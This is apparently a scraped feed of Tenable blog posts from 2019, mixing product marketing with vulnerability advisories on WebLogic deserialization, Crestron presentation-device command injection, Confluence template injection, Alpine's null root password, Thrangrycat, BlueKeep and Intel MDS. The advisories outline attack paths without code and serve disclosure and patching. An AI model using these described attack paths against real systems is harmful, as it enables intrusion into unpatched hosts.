  • CVE-2017-6736 - Buffer Overflow in the Simple Network Management Protocol (SNMP) for Cisco IOS and IOS XE
  • CVE-2018-0296 - Input Validation Vulnerability in Cisco Adaptive Security Appliance (ASA)

Proof-of-concept or exploit code is available for all of the vulnerabilities listed above.

Solution

Because the Sea Turtle campaign is leveraging known vulnerabilities disclosed over the last several years, it is vital for organizations to ensure they are conducting regular vulnerability assessments and have a thorough patch management process.

Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities can be found here.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.


Metrics and Maturity: Benchmarking Your Cyber Exposure Over Time

$
0
0

In part four of our six-part blog series, we explore the challenges facing organizations as they try to accurately answer the question “How are we reducing our exposure over time.” Here’s what you need to know.

When you’re tasked with addressing thousands of vulnerabilities per year, it’s hard to imagine having the luxury to pause and assess your current performance against prior periods. But the only way you’ll know if your security efforts and investments are paying off is by having a standard way to benchmark your progress over time.

The discipline of Cyber Exposure depends on your ability to accurately answer four key questions

  • Where are we exposed? 
  • How should we prioritize based on risk?
  • How are we reducing our exposure over time?
  • How do we compare to our peers?

In part three of our six-part blog series on improving your cybersecurity strategy, we discussed the challenges organizations face in pinpointing those vulnerabilities which pose the greatest threat to their business. Here, we explore the challenges facing organizations as they try to accurately answer the question “How are we reducing our exposure over time.” 

Taming the Scope

The constant changes taking place in your attack surface represent the biggest challenge in achieving an accurate evaluation of your risk reduction over time. For example, a new digital transformation initiative may result in an exponential increase in the number of endpoints and expand the scope of the network required to serve them. Or, a recent merger may have left you with a technology graveyard filled with legacy or limited-use software and hardware which sits neglected yet still attached to the corporate network.

Achieving a complete picture of your total attack surface -- including IoT, OT and cloud assets -- is necessary before you can begin to benchmark your progress over time. 

Figuring Out What To Measure

Once you understand the entirety of your attack surface, the next challenge is to develop a granular understanding of where your most business-critical assets are housed so you can begin to measure your progress in keeping them safe. This means comparing analytical outputs by business unit, geography and asset types.

Common key performance indicators to consider are: 

  • time to assess;
  • time to remediate;
  • effectiveness of prioritizing cyber risk; and
  • identification of assets vulnerable to cyber risk -- including Operational Technology (OT) and Internet of Things (IoT) devices.

It’s also worth monitoring three KPIs most often used to measure the financial consequences of a cyber attack:

  • loss of revenue;
  • loss of productivity; and
  • drop in stock price.

Once you’ve established which metrics you’ll use, you can begin to benchmark your performance by creating a Cyber Exposure score for each incident. Your scoring system should include:

  • Vulnerability severity and exploitability. 
  • Threat context, such as the prevalence of a vulnerability being exploited in the wild or its having characteristics that make it likely it will be exploited in the near term. 
  • Business context, such as how operations will be affected if a particular asset is compromised or taken offline for vulnerability remediation.

Benchmarking Your Process Maturity

Benchmarking starts with raw numbers, such as how many vulnerabilities you have this year compared with last year, or how significant those vulnerabilities are to your organization. But it’s much more than that. It’s also about process maturity, such as how long it takes your organization to remediate critical vulnerabilities this year versus last year, and how effectively you’re responding to new vulnerabilities year over year. 

If you’re struggling to understand where your organization stands in terms of process maturity, you’re not alone. The Cyber Defender Strategies Report from Tenable Research can help. For this report, Tenable Research analyzed five key performance indicators (KPIs) based on real-world end user vulnerability assessment behavior. These KPIs correlate to four VA maturity styles: Diligent, Investigative, Surveying and Minimalist. 

We discovered only five percent of enterprises follow the most mature, Diligent style, displaying a high level of maturity across the majority of KPIs. Diligent followers conduct frequent vulnerability assessments with comprehensive asset coverage, as well as targeted, customized assessments for different asset groups and business units. A further 43% follow Investigative style, indicating a medium to high level of maturity. These organizations display a good scan cadence, leverage targeted scan templates, and authenticate most of their assets. 

Understanding your particular vulnerability assessment style, and learning what steps you can take to advance to the next level of maturity, can go a long way toward setting up your benchmarks and evaluating how well you’re reducing risk over time.

In part one of our six-part blog series on improving your cybersecurity strategy, we explored 4 Cybersecurity Questions Every CISO Should Be Ready to Answer. In part two, we covered 3 Tips for Identifying Your Organization’s Cyber Exposure Gap. In part three, we offered 5 Tips for Prioritizing Vulnerabilities Based on Risk. In part five, we’ll explore best practices for understanding how your Cyber Exposure practices stack up against those of your industry competitors.

Edge 2019: Six Things You Need to Know About Tenable’s Upcoming User Conference

$
0
0

At Tenable’s Edge 2019 user conference, May 21-23 in Atlanta, you’ll learn how to make the most of your product investments and gain valuable Cyber Exposure best practices all while networking with your peers, our experts, and an entire ecosystem of partners. Here’s what it’s all about.

At Tenable, our customers are at the heart of everything we do. That’s why we were so delighted last year to welcome a sold-out crowd to Edge 2018, our inaugural user conference. And we’re looking forward to welcoming you to Edge 2019, May 21 - 23 at the Hilton Atlanta, where you’ll join more than 500 of your peers for a program designed to help you make the most of your Tenable investment.

Here are six highlights from among the many activities we have in store for you at Edge 2019:

  • Tenable University on May 21. This full day of hands-on workshops gives you the opportunity to take a deep-dive into our solutions guided by our top experts. Whether you’re looking for help with advanced scanning using Tenable.sc, craving a behind-the-scenes look at Nessus plugins, or need advice on best practices we’ve got you covered. Tenable University offers the chance to hone your skills and take your deployment to the next level. You’ll receive a certificate of completion which can be used for continuing professional education credits.  
  • An evening with Captain Mark Kelly, American Hero, Commander of NASA Space Shuttle Endeavour’s Final Mission, on May 22 at 5:30 pm. Captain Kelly (Ret.) demonstrates how focus, dedication and persistence can help you tap into your potential to succeed in any competitive setting. Together with his identical twin brother, Scott, Mark has laid the groundwork for the future of space exploration as the subjects of an unprecedented NASA study on how space affects the human body. Mark Kelly will captivate you with lessons learned from his extensive travels and experiences in the Navy, outer space and on the ground. From leading teams in some of the most dynamic environments imaginable, to the thrill of spaceflight, and the recovery and resilience of his wife Gabrielle Giffords, he reveals the foundations for success so you can accomplish your mission in life and work.
  • Joseph Menn keynote and book signing, on May 22 starting at 11:30 am. An investigative reporter for Reuters, Joseph Menn is one of the leading journalists covering cybersecurity. All Edge attendees will receive a free copy of Menn’s fourth book, Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World, which will be released on the PublicAffairs imprint in June 2019. Menn will be available to sign copies of his book immediately following his keynote.
  • Firsthand customer experiences and best practices. Throughout the conference, you’ll have the opportunity to hear directly from your fellow Tenable customers in a variety of keynotes, panel sessions and breakout presentations. Presenters will be on hand from the following organizations: Bell Canada, BJ’s Wholesale Club, DocuSign, Emerson, Express Scripts, French Lick Resort, Guardian, Global Payments, Oak Ridge National Laboratories, Pacific Northwest National Laboratory, Prologis, Raytheon Space and Airborne Systems, Sentara Healthcare, Target and Verizon Media, among others. Find the full list of speakers here. While at Edge, you’re also invited to participate in a short video interview about your experiences with Tenable. Contact customerambassadorteam@tenable.com for full details.
  • The Partner Pavilion. This is where Tenable’s Cyber Exposure ecosystem comes to life. You’ll have the opportunity to connect with experts from nearly 20 partner organizations, including: Amazon Web Services, APCON, Aruba - a Hewlett Packard Company, Autonomic Software, Chronicle, CyberArk, Cybric, Demisto - a Palo Alto Networks Company, Gigamon, IBM Security, LogRhythm, Recorded Future, RedSeal, RedShield, RSA, ServiceNow, Siemens and Splunk. Several partners will also share their learnings and best practices in formal presentations throughout the event. Learn more about our partners here
  • Tenable executives and experts. You’ll hear from Tenable’s leading executives, including Chairman and CEO Amit Yoran, Co-founder and CTO Renaud Deraison, Chief Product Officer Ofer Ben-David, and Chief Marketing Officer Jennifer Johnson. And that’s just the beginning. Tenable experts will be on hand to guide you during University sessions and a wide range of breakout sessions to suit every skill level and use case. See the complete agenda here

While you may be attending Edge to take a deep dive into your Tenable solutions, you’ll also have the chance to take a deep dive of sorts during our Welcome Reception on May 21 at one of the largest aquariums in the world. Other networking activities include: the Customer Experience Lounge, where you can get to know your peers and connect with experts in our Brain Bar; an evening at the World of Coca-Cola; and a special reception on the evening of May 20 for those looking to get an early start on the fun. 

We look forward to seeing you at Edge 2019. Contact your Tenable sales rep today or email edgesupport@tenable.com for your special registration code. We look forward to seeing you in Atlanta May 21-23.

Learn more

For more details about Edge 2019, visit https://www.tenable.com/edge-2019.

Tenable Expands Partnership with Siemens to Secure New Power Plant Controls System

$
0
0

Tenable Industrial Security can now be sold, installed and managed by Siemens professional services staff, alongside the company’s SPPA-T3000 distributed control system.

As attacks on critical infrastructure become more frequent and potentially more damaging, securing Operational Technology (OT) systems has become a top priority for organizations everywhere. According to the Cybersecurity in Operational Technology report from Ponemon Institute and Tenable, 90 percent of security professionals in industries that use OT said their organizations have experienced at least one business-impacting cyberattack over the last two years, and 62 percent have had two or more. 

While many organizations are working diligently to secure their systems, they must be equipped with technology that allows them to identify their true level of risk. This is why we’re pleased to announce the expansion of our partnership with Siemens to include the company’s SPPA-T3000 distributed control system (DCS). Tenable Industrial Security™ can now be sold, installed and managed by Siemens professional services staff, alongside the SPPA-T3000, helping joint customers secure their increasingly dynamic critical infrastructure environments. 

Our expanded partnership with Siemens will provide SPPA-T3000 customers with enhanced visibility into their attack surface and actionable insights about where they are most exposed, two critically important components of any modern security strategy.

Tenable’s Industrial Security offering provides safe, reliable asset discovery and vulnerability detection purpose-built for OT environments. Using passive network monitoring designed for critical systems that require a non-intrusive approach to vulnerability detection, the solution helps SPPA-T3000 customers identify and prioritize OT risks so they can keep safety-critical production assets secure and fully functional. With the existing secure-by-design features of the SPPA-T3000 Cue and the ability to add layers of OT asset discovery and vulnerability detection capabilities from Tenable, joint customers will be able to address the many cybersecurity challenges facing industrial environments.

Tenable Industrial Security is now available to customers operating existing Siemens SPPA-T3000 DCS, as well as on new units.

Learn more:

Oracle WebLogic Affected by Unauthenticated Remote Code Execution Vulnerability (CVE-2019-2725)

$
0
0

Oracle WebLogic is vulnerable to a new deserialization vulnerability that could allow an attacker to execute remote commands on vulnerable hosts.

Background

On April 17, China National Vulnerability Database (CNVD) published a security bulletin about an unauthenticated remote command execution (RCE) vulnerability in Oracle WebLogic (CNVD-C-2019-48814). Oracle WebLogic Server is middleware for deploying and administering web applications. An attacker could send a request to a WebLogic Server, which would then reach out to a malicious host to complete the request, opening up the WebLogic server to an RCE attack.

Analysis

Tenable Research has been examining this vulnerability to provide in-depth understanding of the attack and its risk. With public discourse surrounding how this attack works, and how it differs from CVE-2017-10271, Tenable was able to create a working proof of concept (PoC) against a target updated to the latest version of Web Logic server with the latest Oracle CPU applied.

An attacker could send specially crafted XML requests to a WebLogic server, which then causes the server to execute code instructing the server to reach out to a specific malicious host to complete the request. The WebLogic server then receives another XML response from the malicious host containing additional exploit instructions.

Proof of concept

We have reviewed some of the PoC code in circulation and have demonstrated a modified version of one PoC, which can be seen in the following video:

Solution

Oracle has released an official fix for this vulnerability and it’s available here for WebLogic server 10.3.6, with the fix for 12.1.3 scheduled to release on April 29th 2019. The CNVD listing has also included the following workaround:

  1. Delete the war package from the WebLogic server, and restart the Weblogic service.
  2. Restrict access to, or disable, the “/_async/*” and “/wls-wsat/” URL paths on the WebLogic server.

In addition, Tenable recommends reviewing your organization’s whitelist for trusted sources on your WebLogic server. At this time, known exploits for this vulnerability require the server to reach out to a malicious host. If that malicious host is not trusted, and does not appear on your organizational whitelist, this can reduce the risk of attack for currently available known exploit methods.

Identifying affected systems

A list of plugins to identify this vulnerability will appear here as they’re released.

Get more information 

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Ditch the Spreadsheet and Step Up Your Vulnerability Management Game

$
0
0

Moving from Nessus Pro to Tenable.sc or Tenable.io can easily help you mature your vulnerability management program. Here's what you need to know.

Does your vulnerability management workflow involve a spreadsheet at any point? If so, you’re doing it wrong. Well, maybe not wrong per se, but definitely inefficiently.

In my career, I’ve been both the recipient and the creator of some monster-sized vulnerability spreadsheets that triggered “whack-a-mole” remediation exercises. It can be daunting to determine not only what to fix, but in what order.

In this article, I hope to show you how moving your vulnerability management game up a notch is a fairly easy process, and can be done without losing the investment you’ve already put forth in training and building experience.

What’s first? Well, if you’re reading this, you likely already know how to use Nessus Professional. Tenable also offers a Software as a Service -- Tenable.io -- and an on-premises solution -- Tenable.sc (formerly SecurityCenter).  Each of these tools extends the capabilities of the Nessus vulnerability scanner and can enable a security team of any size to be more effective. The military would call them force multipliers. 

Getting the data

When you move up to one of these platforms, in addition to dozens of new capabilities, you get a platform that will simplify the management of Nessus scanners - local and remote. No more lugging around or mailing a laptop -- simply place scanners as close to the targets as possible. And remember, it’s important to avoid scanning through firewalls, which can alter your results. You can deploy Nessus scanners on different subnets, locations, VLANs, whatever makes sense. A single open port is all that is required to get the data to the console. You can even deploy a Nessus scanner in your DMZ, or use the Tenable Cloud Scanners that are part of Tenable.io (Talk to your Security Engineer for more info).

When you move up to Tenable.sc or Tenable.io, you can also deploy Nessus Agents and passive scanning technology called Nessus Network Monitor (NNM).

A Nessus Agent is a streamlined version of Nessus that scans internally on the asset on which it is installed. Agents are typically deployed to systems that are not always online, such as laptops, and also to systems where you’re not able to get credentials to do a full scan. They do their scans and then push the data back up to either Tenable.sc or Tenable.io.

NNM connects to your network via an Ethernet TAP or a SPAN port on a switch – giving you visibility into what’s going on without injecting a single packet onto the wire. This is critical when you have fragile assets that don’t respond well to scans, such as medical or industrial technologies that can cause harm if they go down, or that antique mainframe running some ancient application (Yes, I’m speaking from professional experience on that one).

What to do with all the data

If you’ve done what I’ve suggested above, you now have tons more data, and so many vulnerabilities! Don’t panic. Tenable has introduced its new Predictive Prioritization functionality in both Tenable.sc and Tenable.io.  With around 60% of new vulnerabilities classified as either high or critical severity, it’s difficult to know where you should start trying to fix them. Using Predictive Prioritization, you can focus on the vulnerabilities posing the greatest threat to your enterprise. Predictive Prioritization uses data science and machine learning to identify vulnerabilities most likely to be exploited in the near future, so you can focus on real rather than theoretical threats.

For more insights into the data and computer science behind Predictive Prioritization, read the Tenable blog, Here are the Answers to your Predictive Prioritization Questions.

With Tenable.io and Tenable.sc, you no longer have to manage vulnerabilities with spreadsheets. You can see the entire picture or focus on specific business units. And with Role-Based Access Control (RBAC) built into both systems, you can easily control access and permissions (I’ve seen executives and auditors given read-only access so they can see what’s going on without running the risk that they’ll break something.) This is another way to use Tenable tools to work more efficiently.

Third-party security tools such as security incident and event monitoring (SIEM), privileged access management (PAM) and ServiceNow’s suite can be integrated with both Tenable.sc and Tenable.io as further force multipliers - driving efficiencies and automating workflows. 

Check out this brief series of videos to see how you can re-prioritize your actual Nessus scan data with Tenable.io in less than 15 minutes.

Cybersecurity pros know how to use Nessus, and have for decades. You can extend that expertise and leverage it to your benefit. Ditch the spreadsheet by adopting Tenable.sc or Tenable.io to step up the maturity of your vulnerability management program. Predictive Prioritization, third-party integrations and the other facets of the tools can help you become laser-focused on the vulnerabilities that have the highest likelihood of impacting your organization.

Learn More:

Multiple Vulnerabilities Found in Presentation Products

$
0
0

Tenable Research has discovered multiple vulnerabilities impacting Crestron’s AM-100 presentation device platform. Two of these also impact several other platforms, including: Barco wePresent, ExtronShareLink, InFocus LiteShow and TEQ AV IT WIPS710.

Background

While researching a Crestron AM-100 AirMedia Presentation Gateway, Jacob Baines discovered that this device shares a code base with several other presentation platforms. He also discovered 15 vulnerabilities in Crestron AM-100 version 1.6.0.2 and AM-101 version 2.7.0.2. Two of these vulnerabilities (CVE-2019-3929, CVE-2019-3930) are also present in: 

  • Barco wePresent WiPG-1000 firmware 2.3.0.10
  • Barco wePresent WiPG-1600 before firmware 2.4.1.19
  • Extron ShareLink 200/250 firmware 2.0.3.4 
  • Teq AV ITWIPS710 firmware 1.1.0.7 
  • InFocus LiteShow3 firmware 1.0.16 
  • SHARP PN-L703WA firmware version 1.4.2.3
  • Optoma WPS-Pro firmware version 1.0.0.5
  • Blackbox HD WPS firmware version 1.0.0.5 
  • InFocus LiteShow4 2.0.0.7

The devices on this list are also vulnerable to CVE-2017-16709, which Crestron patched in 2018.

Analysis

While researching these vulnerabilities, Baines discovered nearly 1,600 devices with this shared code base are open to the internet. He also found that many of the devices are not up to date. You can read all of his findings in the Tenable Tech Blog. Full details of the vulnerabilities in Crestron AM-100 and AM-101 can be found in the Tenable Research Advisory

CVE-2019-3929: Unauthenticated Remote Command Injection via HTTP

This is the most critical of the vulnerabilities and is present in all of the listed devices. A remote, unauthenticated attacker can execute operating system commands as root via crafted requests to the HTTP endpoint file_transfer.cgi. This would allow them to view anything being presented on the presentation device and, more importantly, use the presentation device as a pivot point to the internal network. They could also replace the client software presenters must download to connect to the device with their own malicious software, giving them access to the presenter’s device.

Vendor response 

Tenable Research attempted to coordinate with all of the impacted vendors. Barco released firmware version v2.3.1.16 and Extron has released firmware version 2.3.08 to address the vulnerabilities that impact their platforms. As of April 30, Crestron has not released an update. If you deploy devices from the other vendors listed, we recommend reaching out to them directly for more information.

Solution

Ensure your devices are updated fully and are not exposed to the internet.

Tenable has developed an exploit plugin to test for CVE-2019-3929.

Additional information

Visit the Tenable Tech Blog on Medium to read researcher Jacob Baines’ in-depth story about his work uncovering these vulnerabilities.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

CVE-2019-3396: Vulnerability in Atlassian Confluence Widget Connector Exploited in the Wild

$
0
0

Attackers are targeting vulnerable Confluence instances after company published a fix for the vulnerability back in March 2019.

Background

On March 20, Atlassian published a Confluence Security Advisory to announce fixes for two vulnerabilities, CVE-2019-3395 and CVE-2019-3396.

CVE-2019-3395 is a critical server-side request forgery (SSRF) vulnerability in the WebDAV plugin in Confluence Server and Data Center versions released before June 18, 2018. 

CVE-2019-3396 is a critical server-side template injection vulnerability in Confluence Server and Data Center Widget Connector that could lead to path traversal and remote code execution.

In the weeks since the publication of the advisory, attackers have been probing for and exploiting CVE-2019-3396 on vulnerable systems.

Analysis

On April 23, AlertLogic published a blog about attackers exploiting CVE-2019-3396 to install GandCrab ransomware. GandCrab was first spotted in January 2018 and distributed through the RIG and GrandSoft exploit kits. GandCrab has also been distributed through malicious spam emails.

On April 26, Trend Micro published a blog about the AESDDoS botnet leveraging CVE-2019-3396 to infect systems and launch distributed denial of service (DDoS) attacks against other hosts and even use the infected systems for cryptocurrency mining.

Proof of concept

Following Atlassian’s advisory for these vulnerabilities in March, proof-of-concept code began to appear throughout the early part of April [1, 2, 3, 4]. Soon after, in-the-wild attacks began.

Solution

Atlassian recommends upgrading to the latest version of Confluence, which is 6.15.1 at the time of publication.

  • For users of 6.12.x versions prior to 6.12.3, upgrade to 6.12.3 or later and 6.14.x versions prior to 6.14.2, upgrade to 6.14.2 or later.
  • For users of enterprise release versions 6.6.x prior to 6.6.12, upgrade to 6.6.12 or later and 6.13.x versions prior to 6.13.3, upgrade to 6.13.3 or later.
  • For users of older versions from 1.x.x through 5.x.x and versions 6.0.x through 6.11.x, Atlassian recommends upgrading to 6.14.2, 6.13.3 or 6.6.12.

Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities can be found here.

Below is a sample scan output for CVE-2019-3396.

sample Nessus scan output for CVE-2019-3396.

Get more information 

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.


CVE-2019-5021: Hard-Coded NULL root Password Found in Alpine Linux Docker Images

$
0
0

A Hard-Coded NULL root user password vulnerability was found in Alpine Linux Docker Images from December 2015’s 3.3 version onward. Users are encouraged to disable the root user, or any services that utilize the system shadow file as an authentication database.

Background

In November 2015, a bug in Alpine Linux Docker Images was patched to prevent the /etc/shadow file from accepting a NULL password for the root user. However, eight days later, an update was pushed to the Alpine Linux project that accidentally removed this fix. Since that time, all versions of Alpine Linux from 3.3 to 3.9 have accepted a NULL password for the root user if services like Linux PAM are running on the system, due to the usage of /etc/shadow as an authentication database.

Analysis

On May 8 2019, Cisco Talos published a disclosure for this vulnerability after reporting its findings to the Alpine Linux team. The root account is enabled by default and, unless the account is explicitly locked, affected versions will treat the root account as having a blank password.

Solution

Upgrading to the latest supported versions of Alpine Docker (3.6.5, 3.7.3, 3.8.4, 3.9.3, and edge) will fix this vulnerability.

Users are encouraged to completely disable the root account on all affected versions of Alpine Linux Docker images, if upgrading is not an option for you at this time. However, if your Alpine Linux assets aren’t using a service that treats the /etc/shadow file as a password database, this vulnerability is not exploitable even if the root account is enabled.

Identifying affected systems

For Tenable customers, due to the age and nature of this vulnerability, the Unpassworded 'root' Account plugin will flag any exploitable hosts without any updates or changes to the plugin. As always, we encourage customers to include the Default Unix Accounts family in their scans for configurations that contain blank or default passwords.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Thrangrycat: Vulnerabilities in Cisco Secure Boot and Cisco IOS XE (CVE-2019-1649, CVE-2019-1862)

$
0
0

Researchers identify vulnerabilities in Cisco Secure Boot process and Cisco IOS XE devices that could reportedly be chained together for significant impact.

Background

On May 13, Cisco published two security advisories for vulnerabilities in Cisco Secure Boot and Cisco IOS XE. Researchers at security firm Red Balloon Security, Inc. discovered and reported the vulnerabilities to Cisco’s Product Security Incident Response Team (PSIRT) in November 2018. The security firm refers to the Secure Boot vulnerability by three angry cat emojis (😾😾😾) instead of a name, but says that a “suitable enunciation” of the emojis is Thrangrycat.

Analysis

😾😾😾 or Thrangrycat (CVE-2019-1649) is an authenticated hardware tampering vulnerability in the Field Programmable Gate Array (FPGA) for Cisco’s Secure Boot process. If a local attacker were to exploit this vulnerability, they would be able to render a vulnerable device unusable or implant a malicious firmware image on it.

CVE-2019-1862 is an authenticated command injection vulnerability in Cisco IOS XE’s web-based user interface caused by improper sanitization of user-supplied input. A remote attacker who exploits this vulnerability would be able to execute commands as root on affected devices.

Red Balloon Security Inc. says Thrangrycat bypasses Cisco’s Trust Anchor module (TAm) that underpins Cisco’s Secure Boot process, but Cisco has publicly disputed the claim that it affects Trust Anchor.

According to Red Balloon’s disclosure, chaining the two vulnerabilities together reportedly enables a remote attacker to bypass Cisco’s Secure Boot and “lock out all future software updates to the TAm.”

Proof of concept

Cisco’s PSIRT team is aware of proof-of-concept (PoC) code for Cisco ASR 1001-X devices as well as for IOS XE software. These were likely shared with them by the Red Balloon Security team. However, they are currently unaware of any PoCs in the wild.

Solution

Cisco released a patch for CVE-2019-1862 for Cisco IOS XE and also provided a tool called Cisco IOS Software Checker to identify vulnerabilities in Cisco IOS and IOS XE.

For Thrangrycat, Cisco says it is working on patches, but notes that the patch won’t be a straightforward update for most devices as it will require “on-premise[s] reprogramming of a low-level hardware component.”

The security advisory for Thrangrycat lists 53 Bug IDs under the Affected Products section, which includes Cisco ASA 5500-X Series with FirePOWER Services, Cisco Firepower 2100, 4000 and 9000 series, as well as other Cisco routers, switches and network interface modules. Patches for these devices will be released anywhere between May 2019 and November 2019. Please refer to the advisory page for more details on planned firmware availability.

Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities will appear here as they’re released.

Please note that the link above will contain newer plugins over time as Cisco releases newer patches throughout the year.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Critical Remote Code Execution Vulnerability CVE-2019-0708 Addressed in Patch Tuesday Updates

$
0
0

Microsoft has released its May 2019 Security Updates, which includes a fix for CVE-2019-0708, a critical remote code execution vulnerability affecting the Remote Desktop Service.

Background

Microsoft has released its monthly security update for May. Included in this month's Patch Tuesday release is CVE-2019-0708, a critical remote code execution vulnerability that could allow an unauthenticated remote attacker to execute remote code on a vulnerable target running Remote Desktop Protocol (RDP). 

Analysis

The vulnerability exists in the way that the RDP service handles incoming requests. An attacker can send a malicious request to the RDP service and, due to improperly sanitized request handling, the target will execute the malicious code injected into the request. CVE-2019-0708 is a pre-authentication vulnerability that requires no user interaction, which would result in attacks exploiting it to spread in a manner similar to WannaCry. While there isn’t any public proof-of-concept (PoC) or exploit script code available at this time, we anticipate that won’t be the case for long. 

This vulnerability provides attackers with a common attack vector that many internet-facing Windows assets are likely to have running. Shodan and Binary Edge searches both show millions of internet-facing assets with actively listening RDP services.

CVE-2019-0708 Microsoft Patch Tuesday May 2019

Solution

Tenable recommends applying the full May 2019 Security Update from Microsoft for all vulnerable assets. For CVE-2019-0708, Microsoft has provided updates for Windows 7, Windows Server 2008 and Windows Server 2008 R2. Additionally, Microsoft has provided patches for out-of-support systems, including Windows XP, Windows XP Professional, Windows XP Embedded and Windows Server 2003.

Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities will appear here as they’re released.

Get more information 

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Nessus Home Is Now Nessus Essentials

$
0
0

We’ve given Nessus Home a refresh, and we’re excited to share with you the new and updated free vulnerability assessment solution, Nessus Essentials. 

As part of the Nessus family, Nessus Essentials is a free vulnerability assessment solution for up to 16 IPs that provides an entry point into the Tenable ecosystem. 

Backed by market leading functionality from Nessus Professional, Nessus Essentials gives you the accuracy and speed you need to discover, prioritize and remediate vulnerabilities. 

Now, with Nessus Essentials, you get: 

  • Unlimited asset discovery scanning, limited to 16 IPs for vulnerability assessment.
  • The ability to scan and use anywhere. You are no longer limited to private address space (RFC1918) and home use only.
  • The power of Tenable Research. Our research team works closely with the security community to discover new vulnerabilities and provide insights into published vulnerabilities to help organizations quickly detect them in their environment. These insights are built into Nessus Essentials to keep you up to date on the latest vulnerabilities. 
  • No time limit for usage. Use Nessus Essentials for as long as it meets your needs. Should you require advanced features and the ability to scan more than 16 IPs, you can seamlessly upgrade to Nessus Professional.
  • Access to the Nessus training curriculum. Enjoy access to Tenable University training classes to help you understand and take full advantage of Nessus Essentials.  
  • Community Engagement. Engage with your peers and the Tenable team in the Tenable Community to get your questions answered quickly and get tips and tricks for optimizing your product. 

Tenable announces Nessus Essentials

Tenable launches Nessus Essentials

Learn more

Microarchitectural Data Sampling: Speculative Execution Side-Channel Vulnerabilities Found in Intel CPUs

$
0
0

Researchers disclose speculative execution side-channel attacks named ZombieLoad, RIDL and Fallout in Intel Central Processing Units (CPUs).

Background

On May 14, public disclosures from multiple research groups regarding a new set of speculative execution side-channel vulnerabilities in Intel CPUs were published, along with software updates from various operating system, virtualization and cloud vendors. The vulnerabilities, independently discovered but collectively referred to as Microarchitectural Data Sampling (or MDS) attacks, are also individually named ZombieLoad, RIDL and Fallout by the researchers who discovered them. They follow in the footsteps of the Spectre and Meltdown vulnerabilities reported in 2018.

Analysis

The following is a table of the four CVEs associated with MDS attacks, which includes acronyms and associated names.

CVE

Name

Acronym

Named Vulnerability

CVE-2018-12126

Microarchitectural Store Buffer Data Sampling

MSBDS

Fallout

CVE-2018-12127

Microarchitectural Load Port Data Sampling

MLPDS

RIDL

CVE-2018-12130

Microarchitectural Fill Buffer Data Sampling

MFBDS

ZombieLoad

CVE-2019-11091

Microarchitectural Data Sampling Uncacheable Memory

MDSUM

RIDL

The MDS vulnerabilities all focus on the “sampling” of data from CPU buffers that reside between the processor and cache. The term “sampling” here can be described as eavesdropping on the buffers and capturing the data frequently.

ZombieLoad


CVE-2018-12130 or the “ZombieLoad” attack, is so named because the CPU “resurrects your private browsing history and other sensitive data,” which can be achieved by targeting the fill buffer (MFBDS) logic of the processor. In a demo video, the researchers behind ZombieLoad show how they are able to retrieve URLs accessed on a machine using the Tor Browser.

RIDL

RIDL is an acronym for “Rogue In-Flight Data Load,” which describes the leaking (or “sampling”) of in-flight data from the Line-Fill Buffers (MFBDS) and Load Ports (MLPDS) used by the CPU to load or store data from memory. The associated CVEs for RIDL are CVE-2018-12127, CVE-2019-11091, as well as overlap with CVE-2018-12130, which was discovered independently.

Researchers from VuSec have uploaded the following exploit demo videos showing successful attacks using RIDL vulnerabilities in three different scenarios:

RIDL leaking root password hash (over a 24-hour period):

RIDL leaking Linux kernel data:

RIDL from JavaScript:

Fallout

CVE-2018-12126, or the “Fallout” attack, was named by the researchers because “Fallouts are typically a direct consequence of Meltdowns,” indicating it is a follow-up to the Meltdown vulnerability. Fallout targets the Store Buffer (MSBDS), which is used by the CPU pipeline whenever it needs to store any data. What is most notable about this attack is that “an unprivileged attacker can then later pick which data they leak” from the Store Buffer. The researchers behind the discovery of Fallout say that despite the hardware countermeasures introduced to address Meltdown, the CPUs are now more vulnerable to attacks like Fallout.

Unlike ZombieLoad or RIDL, there do not appear to be any demo videos for Fallout at the time of publication for this blog.

Proof of concept

Researchers have published proof-of-concept (PoC) code to Github for ZombieLoad, but there do not appear to be any PoCs for RIDL or Fallout at the time this blog was published.

Solution

Intel has published a document with a list of planned or available microcode updates for different Intel CPUs, as well as a list of products where no microcode update will be provided. Intel has also stated that the MDS vulnerabilities are addressed in 8th and 9th Generation Intel Core processors and the 2nd Generation Intel Xeon Scalable processor family.

The following vendors have published advisories, knowledge base, support and FAQ articles detailing their efforts to address MDS for their operating systems, products and cloud-based services, including microcode and software updates:

Other vendors will likely follow up and provide patches in the coming weeks and months.

Identifying affected systems

A list of Nessus plugins to identify these vulnerabilities will appear here as they’re released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Viewing all 1936 articles
Browse latest View live